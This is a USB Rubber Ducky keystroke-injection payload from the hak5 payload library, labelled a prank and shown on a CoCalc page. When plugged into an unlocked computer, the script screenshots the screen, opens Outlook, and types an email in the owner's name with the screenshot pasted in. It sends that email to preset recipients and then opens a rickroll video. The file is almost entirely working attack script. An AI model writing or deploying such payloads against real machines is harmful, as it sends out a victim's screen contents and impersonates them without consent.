Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/prank/Automailer/payload.txt
2968 views
1
REM Title: Automailer
2
REM Author: Ratcode404(.github.io)
3
REM Description: Snaps screen, opens outlook, sends a message to various people with pre-configured text, adds screenshot and opens up a muted 1 hour rickroll youtube video once done.
4
5
REM Default Delay (350 should be mid-speed)
6
DEFAULT_DELAY 350
7
8
REM Take screenshot
9
SHIFT WINDOWS S
10
DELAY 200
11
TAB
12
TAB
13
TAB
14
TAB
15
ENTER
16
DELAY 300
17
18
REM Open Outlook (Change E-Mail and text)
19
GUI r
20
DELAY 100
21
STRING outlook.exe /c ipm.note /m [email protected]?v=1&[email protected]
22
ENTER
23
DELAY 500
24
STRING Subject goes here.
25
TAB
26
STRING Hello Ratcode!
27
ENTER
28
STRING I like to leave my device unlocked and would want to invite you to some free dinner tonight.
29
ENTER
30
STRING xoxo
31
32
REM Paste Screenshot in Mail (CTRL V)
33
SHIFT INSERT
34
DELAY 200
35
36
REM Send Mail
37
ALT S
38
ENTER
39
DELAY 200
40
41
REM Rickroll, Mute and Fullscreen (Can adjust link obviously)
42
GUI r
43
DELAY 100
44
STRING https://www.youtube.com/watch?v=zL19uMsnpSU
45
ENTER
46
DELAY 300
47
M
48
DELAY 200
49
F
50
51